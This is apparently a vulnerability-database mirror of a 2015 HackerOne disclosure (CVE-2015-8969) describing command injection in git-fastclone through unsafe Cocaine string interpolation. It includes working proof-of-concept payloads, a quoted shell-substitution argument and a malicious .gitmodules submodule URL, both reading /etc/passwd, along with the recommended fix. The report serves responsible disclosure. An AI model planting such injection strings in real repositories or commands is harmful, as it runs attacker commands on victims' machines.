Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneBburkyH1:105190
HistoryDec 15, 2015 - 4:47 a.m.

Square Open Source: Unsafe usage of Ruby string interpolation enabling command injection in git-fastclone

2015-12-1504:47:56
bburky
hackerone.com
27

EPSS

0.034

Percentile

91.4%

JSON

While testing git-fastclone for the ext protocol issues in my other report, I looked at the source code and immediately noticed you’re using the Cocaine library unsafely. Cocaine will protect from command injection but it “only does that for arguments interpolated via run, NOT arguments passed into new” (from it’s README).

Throughout git-fastclone you call Cocaine::CommandLine.new and use plain Ruby string interpolation. This is enables command injection in basically every instance. Instead you need to construct the command line passed to #new with :foo placeholders and use #run to perform the variable substitution. The security section of the README talks about this a bit.

Here’s a very simple exploit POC:

git fastclone "'"'$(cat /etc/passwd >&2)'"'"

This first POC may seem less severe because the exploit string is visible to the user. However, in many places command injection is possible using from attacker controlled values within the git repository. Consider the following POC instead which performs command injection into Cocaine::CommandLine through a git submodule URL. (Note that this exploit has absolutely nothing at all to do with my previous report concerning the git ext protocol.)

git init cocaine-command-injection
cd cocaine-command-injection

# This can be the URL of any valid git repository
# This is just used to initially create the submodule in the repo
git submodule add https://github.com/octocat/Hello-World malicious-submodule

cat >.gitmodules <<"EOF"
[submodule "malicious-submodule"]
    path = malicious-submodule
    url = "'`cat /etc/passwd >&2`'"
EOF
git add .gitmodules
git commit -m 'Malicious Cocaine command injection submodule'
cd ..

# Now clone the repository
git fastclone cocaine-command-injection cocaine-command-injection-clone

Please instead safely build Cocaine::CommandLine calls by passing placeholders to #new and use Cocaine’s variable interpolation using the hash passed to #run.

Related

prion 1
cvelist 1
rubygems 1
github 1
osv 1
nvd 1
cve 1
prion
prion
Command injection
2016-11-03 10:59:00
cvelist
cvelist
CVE-2015-8969
2016-11-03 10:00:00
rubygems
rubygems
git-fastclone Shell Metacharacter Injection Arbitrary Command Execution
2015-12-14 21:00:00
github
github
Git-fastclone passes user modifiable strings directly to a shell command
2018-08-15 20:04:44
osv
osv
Git-fastclone passes user modifiable strings directly to a shell command
2018-08-15 20:04:44
nvd
nvd
CVE-2015-8969
2016-11-03 10:59:01
cve
cve
CVE-2015-8969
2016-11-03 10:59:01

EPSS

0.034

Percentile

91.4%

JSON
Related for H1:105190
prion1cvelist1rubygems1github1osv1nvd1cve1